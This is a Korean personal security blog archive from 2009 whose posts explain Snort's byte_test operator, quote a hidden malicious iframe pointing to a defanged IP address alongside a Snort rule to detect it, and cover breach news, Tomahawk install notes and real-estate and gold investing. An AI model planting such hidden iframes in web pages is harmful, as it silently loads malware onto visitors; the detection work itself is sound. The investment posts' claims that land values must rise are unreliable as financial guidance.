SNORT2009. 10. 9. 16:16

byte_test 기능에서 & 연산방법

공부하고 있는 것이다보니 틀린 부분이 분명히 있을것입니다.. 그리고 영어 이해력이 떨어져서 옵션의 설명이 틀릴 수 있습니다. 틀린 부분에 대한 지적 부탁 드리겠습니다.

byte_test는 특정 필드 값을 연산자를 이용해서 매칭 하는 기능(?)

사용방법
 byte_test: <bytes to convert>, [!]<operator>, <value>, <offset>[,relative] [,<endian>] [,<number type>, string];

byte to convert : 패킷으로 부터 끄집어 낼 byte 수
operator : <,>,=,!,&,^
value : 변환된 값과 비교할 값
offset : payload에서 프로세싱 시작할 byte 수
relative : 마지막으로 패턴 매칭된 offset에서 시작
endian : [byte to convert] 의 값을 big endian 또는 little endian 형태로 처리하는 옵션
            big-big endian으로 테이터 처리(default)
            little-little endian으로 데이터 처리
string :  패킷에서 데이터는 string 형태로 저장된다.(?)
number type : type of number being read
                    hex-변환된 string 데이터는 16진수로 표현된다.
                    dec-변환된 string 데이터는 10진수로 표현된다.
                    oct-변환된 string 데이터는 8진수로 표현된다

위에서 연산자 & 에 대해서 알아보자.
예는 https://forums.snort.org/forums/rules/topics/byte_test-and-the-operator-2 에서 언급된 것으로 해보자.

payload의 첫 16 byte 가 아래와 같다고 하자.
65 98 85 83 00 01 00 00 00 01 00 00 08 63 70 64

byte_test:1,&,2,3

10000101= '85’
00000010 = '2'
.........^ Not set
위 값들을 and 연산하면 아래와 같다.
00000000 ='0' 이기때문에 거짓

byte_test:1,&,1,3 
10000101 = ‘85’
00000001 ='1'
...........^ Set and Match!
00000001 ='1' 이기때문에 참

byte_test:1,&,128,2 
10011000 = ‘98’
10000000 = '128'
^ Not set
00000000 = '0' 이기때문에 거짓

snort에서는 참이면 탐지하는 것이다.

참고 했던 사이트에서 Joel_Esler 라는 사람이 답변한 내용에서 Bit Sequence 부분은 이해가 가지 않는다.

& is a bitwise “and”. So, for the first byte_test, it moves three bytes into a packet, takes one
byte, and checks to see if it is a 2. (So the 7th bit in the Bit Sequence is set), the second one
indicates that the 8th bit in the Bit Sequence is set, and the 3rd one indicates that the first bit in
the Bit Sequence is set.

'SNORT' 카테고리의 다른 글

SNORT+BASE 설치 메뉴얼 (DEBIAN/UBUNTU)  (0) 2011.09.19
정규 표현식 기호-2  (0) 2010.03.02
정규 표현식 기호-1  (0) 2010.03.02
국내 Snort Rule 공유 블로그  (1) 2009.09.15
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2009. 10. 8. 16:51

iframe 신종(?) 우회 방법

<iframe name=c24 src='hxxp://205.234.243.220/d/index.php?'+Math.round(Math.random()*28396)+'9c10b5bc42d8' width=62 height=458 style='visibility:hidden'></iframe>

iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.

그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..

위 코드에서 사용된 style='visibility:hidden' 은 iframe을 보이지 않게한다..
 이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.

여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style='visibility:hidden' 옵션을 써서 iframe을 숨길까?

alert tcp $EXTERNAL_NET $HTTP_PORTS->$HOME_NET any(msg:"iframe evation attack-visibility:hidden"; flow:established,from_server; content:"<iframe"; nocase; pcre:"/<iframe.{0,40}src=('|")(http|ftp)://.*(width|height)=[^=0].*style=('|")visibility:(\s)?hidden('|")/i"; sid:XXXXXXX; rev:1;)

오탐 발생하면 알려주시고 고칠 부분이 있으면 comment 달아주십시요..^^

ps. 위 iframe 코드를 제공해준 나의 영원한 동반자인 이지스(bscry) 고맙다..

Websense에서도 동일한 날짜(?)에 포스팅된게 있네요..그래서 패턴을 좀 바꿔봤습니다.

http://securitylabs.websense.com/content/Alerts/3488.aspx

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?)우회 방법-2  (0) 2009.10.09
Posted by regexkorea
보안 사이트 소개2009. 10. 8. 15:48

웹 사이트 안전한지 점검 해주는 Norton Safe Web

https://safeweb.norton.com/

꽤 괜찮은 사이트이다.. 기존에 분석이 되지 않았을 경우에는 예약을 자동으로 해준다..
근데 언제 분석이 되는 걸까? ^^

'보안 사이트 소개' 카테고리의 다른 글

오늘의 자료  (0) 2014.02.06
regex 테스트 사이트  (1) 2012.02.22
참고 사이트  (0) 2012.02.21
WireShark 공부 방법  (0) 2011.04.19
대학 CERT 연합  (0) 2010.02.23
Posted by regexkorea
보안 이야기2009. 9. 28. 13:16

OK캐쉬백 콜센터, 고객정보 2만건 유출...보안관리 엉망!

OK캐쉬백 콜센터, 고객정보 2만건 유출...보안관리 엉망!

 

해마다 생기는 대기업들은 보안사고..

보안이 눈에 보이는 이득을 주지는 않지만, 한번 보안사고가 커지면 억대의 피해와 회사 이미지에 큰 타격을 주는데

현실은 그렇지가 않네요.

 

내부 인력의 정보 유출에 대한 프로세스가 절실합니다..

ISMS 27001에도 역시 아웃소싱에 대한 보안 부분이 있던데..

개인정보를 가지고 있는 회사는 적어도 이런류의 인증을 필히 받게끔 해야될것 같습니다.

 

래야 보안 인력 자리가 늘겠죠? ^^;


'보안 이야기' 카테고리의 다른 글

New Adobe Vulnerability Exploited in Targeted Attacks  (0) 2009.10.09
tracert 와 traceroute가 사용하는 프로토콜은?  (0) 2009.10.08
정부, DDoS 방어장비 구축 200억 투입  (0) 2009.09.28
사회공학 스팸메일-신한은행  (1) 2009.09.24
V3Zip 출시  (0) 2009.09.23
Posted by regexkorea
보안 이야기2009. 9. 28. 13:00

정부, DDoS 방어장비 구축 200억 투입


정부, DDoS 방어장비 구축 200억 투입

드디어 200억 예산을 집행한다고 하네요..

연말까지 설치가 목표라고 하던데..

 

국회의원 보좌관인 친구가 국감때문에 저에게 도움을 청해서 다녀왔습니다..^^

해당 국회의원이 행안부쪽의원회라서..DDoS에 대해 이것저것 얘기했었는데..

그중에 200억 언제 집행되냐? 장비만 사서 되겠냐..인력이 필요한테 인력 충원을 매번 계약직으로만 한다.

뭐 이래 저래 하소연했었는데..

오늘 인터넷 신문에 나오네요..^^

 

기자가 엿들었나...^^;

 

장비는 단순히 센서 일뿐 사람이 모든 걸 컨트롤해야한다는걸 잊지 말아야겠습니다..

'보안 이야기' 카테고리의 다른 글

tracert 와 traceroute가 사용하는 프로토콜은?  (0) 2009.10.08
OK캐쉬백 콜센터, 고객정보 2만건 유출...보안관리 엉망!  (0) 2009.09.28
사회공학 스팸메일-신한은행  (1) 2009.09.24
V3Zip 출시  (0) 2009.09.23
김희정 원장 “보안 전투력 확 키운다”  (1) 2009.09.23
Posted by regexkorea
보안 프로그램2009. 9. 22. 10:18

토마 호크 설치 하기


여기서 말하는 토마호크는 군사용 미사일이 아니다..^^
 패킷을 재생시켜주는 도구 이다.. 예를 들어 CC 인증시 탐지 테스트를 할때 각 패턴에 대해서 모의 해킹 형식으로 해서 탐지테스트를 할것인가? 그러기 위해서는 여러 PC들이 필요하고 각종 취약성이 설치되어야하는 번거로움이 생긴다..
패턴을 개발시 테스트했던 트래픽을 가지고 재생하면 얼마나 편한가.. 뭐 그런용도는 아마 토마호크의 일부분일 것이다..

토마호크가 무엇인지, 설치하기 위해 무엇이 필요한지에 대해 아래 사이트에서 확인 할 수 있다.
http://tomahawk.sourceforge.net/ 

Download

To compile Tomahawk, you'll need to get Libnet 1.02a and Libpcap 0.8.1, as well as the Tomahawk source:

For your convenience, the following binaries are available:


우선 토마호크를 설치하기위한 사양은 다음과 같다.
     o 1.4+ GHz processor
     o At least 512 MB RAM
     o Two gigabit test NICs.  The Intel Pro1000 adapters are inexpensive
        and work well.  If you have only one PCI slot, the Intel dual port
        Pro1000 can be used.
     o One NIC for management

운영체제는 기본적으로 리눅스를 이용하면 되며,  Libnet 1.02a, Libpcap 0.8.1 이 필수적으로 설치가 되어있어야 한다.

Libpcap 0.8.1
http://sourceforge.net/projects/libpcap/

Libnet 1.02a
http://www.filewatcher.com/m/libnet-1.0.2a.tar.gz.140191.0.0.html

Release 1.1 또는 Release 1.0을 선택해서 설치하면된다.
유의해야할 사항은 Libpcap 0.8.1 과 Libnet 1.02a, Tomahawk 는 /usr/local 경로에서 설치하여야한다..
자세한 사항은 Tomahawk 파일을 풀어서 INSTALL 을 읽고 따라하면된다.

소스 컴파일이 안된다면 For your convenience, the following binaries are available:  가있다.
Redhat 7 또는 이후의 리눅스에서 컴파일한 바이너리를 다운로드 받아서 그냥 /bin 파일에 올려 놓으면 된다..

다 귀찮으면 그냥 Redhat 7 계열 리눅스 설치하고 Tomahawk 바이너리 다운로드 받으면 해결된다..^^

'보안 프로그램' 카테고리의 다른 글

Digital Forensic SIFTing: SUPER Timeline Creation using log2timeline-sift  (0) 2012.06.25
Backtrack IP 설정  (0) 2011.12.13
Packet Generator Tool  (0) 2011.11.21
nc 응답 테스트  (1) 2011.04.19
Penetration Testing Tools  (0) 2009.10.14
Posted by regexkorea
보안 이야기2009. 9. 16. 08:36

안철수 연구소가 원하는 인재는 A 형

보안업계 입문을 위해 준비해야할 것은?
출처 : 보안뉴스
원문 : http://www.boannews.com/media/view.asp?idx=17783&kind=1

활동(?)하는 보안카페에서 보면 보안쪽 업무를 하기위해 무엇이 필요한지에 대한 질문이 많다.
보안쪽에도 예상외로 많은 업무들이 있기때문에 관련 업무에 맞게 준비하는게 중요하다고 생각한다. 그러나 접해보지 않으면 모르기때문에 답답해서 질문하는 것일꺼다..

보안뉴스에서 안철수 연구소 인사 채용 담당자와의 인터뷰 내용을 보면 그래도 기본적으로 준비해야하는것에 대해서 잘 설명하셨다..

'보안 이야기' 카테고리의 다른 글

정부, DDoS 방어장비 구축 200억 투입  (0) 2009.09.28
사회공학 스팸메일-신한은행  (1) 2009.09.24
V3Zip 출시  (0) 2009.09.23
김희정 원장 “보안 전투력 확 키운다”  (1) 2009.09.23
BC카드사 고객정보 유출, 주인 모르게 인터넷결제  (0) 2009.09.16
Posted by regexkorea
걱정이 재태크2009. 9. 15. 15:20

팽현숙씨의 부동산 재테크

'내조 재테크' 책 펴낸 팽현숙씨
출처 : 조선닷컴
원문 : http://news.chosun.com/site/data/html_dir/2009/09/14/2009091401806.html

부동산도 주식과 같이 분산 투자를 해야한다는 내용과 적은 돈으로도 하나씩 장만해나가는 방법을 추구해야할 것으로 보인다..
팽현숙씨 처럼 생각을 못하고 그냥 무조건 서울에 집. 이렇게만 생각했었는데 생각의 변화를 주게 하는 방법이었다..
39세에 100억 벌었다는 이진우 소장의 강연에 다녀온 지인이 이런 말을 한적이 있었다. 100만원으로 여기저기 전국에 조금씩 땅을 사놓으면 그 중에 하나는 걸려서 대박이 난다고 한단다.. 뭐 직접 들은 이야기는 아니지만..맞는 말이기도 하다 언젠가는 아래 포스팅된 글과 같이 전국토의 95%가 도시화가 된다면 그 중에 하나 안걸리겠는가..
그래서 그분은 200~300만원 들여서 군부대 바로 앞에 조그마한 땅을 공매로 사셨다..
언젠가는 그 군부대가 이전하겠지..ㅋㅋㅋ

'걱정이 재태크' 카테고리의 다른 글

해수욕장 인근 아파트를 이용한 임대 사업  (0) 2009.10.13
여윳 돈 630만원 순금에 투자! 일년만에 수익 210만원!!  (0) 2009.09.16
전국토의 도시화에 대한 전망을 기사를 보고  (0) 2009.09.15
금투자 관련 수기를 읽고..  (0) 2009.09.15
Posted by regexkorea
걱정이 재태크2009. 9. 15. 15:12

전국토의 도시화에 대한 전망을 기사를 보고

“한국 2050년 1인소득 8만달러”
출처 : 서울신문
원문 : http://www.seoul.co.kr/news/newsView.php?id=20090904006015

2050년이 되면 전국토의 95%가 도시화가 된다고 한단다..
그러면 역시 부동산으로 투자를 해보는게 좋은 방법 중에 하나인것 같다.
다음에 포스팅할 개그우먼 팽현숙씨의 부동산 재테크에서 볼수 있듯이 부동산을 장기적으로 보유하다보면 결국에는 오를수 밖에 없는 구조가 될 것이다.
아직까지 지방에 잘 찾아보면 싸게 투자하여 장기적인 투자로 지켜볼만 한 곳이 있을 것으로 보인다.

'걱정이 재태크' 카테고리의 다른 글

해수욕장 인근 아파트를 이용한 임대 사업  (0) 2009.10.13
여윳 돈 630만원 순금에 투자! 일년만에 수익 210만원!!  (0) 2009.09.16
팽현숙씨의 부동산 재테크  (0) 2009.09.15
금투자 관련 수기를 읽고..  (0) 2009.09.15
Posted by regexkorea
걱정이 재태크2009. 9. 15. 15:04

금투자 관련 수기를 읽고..

여윳 돈 630만원 금에 투자해보니 라는 짠돌이라는 카페 내용을 보니 꽤 괜찮은 투자 방법 중 하나라는 생각이 든다..
내용에서 보듯이 결혼 시즌에 맞춰서 거래를 하게 되면 꽤 괜찮은 수익을 얻을 것으로 보인다.
현재 금값이 천정부지로 올라가고 있는데 앞으로 인플레이션이 온다고 한다면 최고의 투자 상품이 될것이다..

'걱정이 재태크' 카테고리의 다른 글

해수욕장 인근 아파트를 이용한 임대 사업  (0) 2009.10.13
여윳 돈 630만원 순금에 투자! 일년만에 수익 210만원!!  (0) 2009.09.16
팽현숙씨의 부동산 재테크  (0) 2009.09.15
전국토의 도시화에 대한 전망을 기사를 보고  (0) 2009.09.15
Posted by regexkorea

티스토리툴바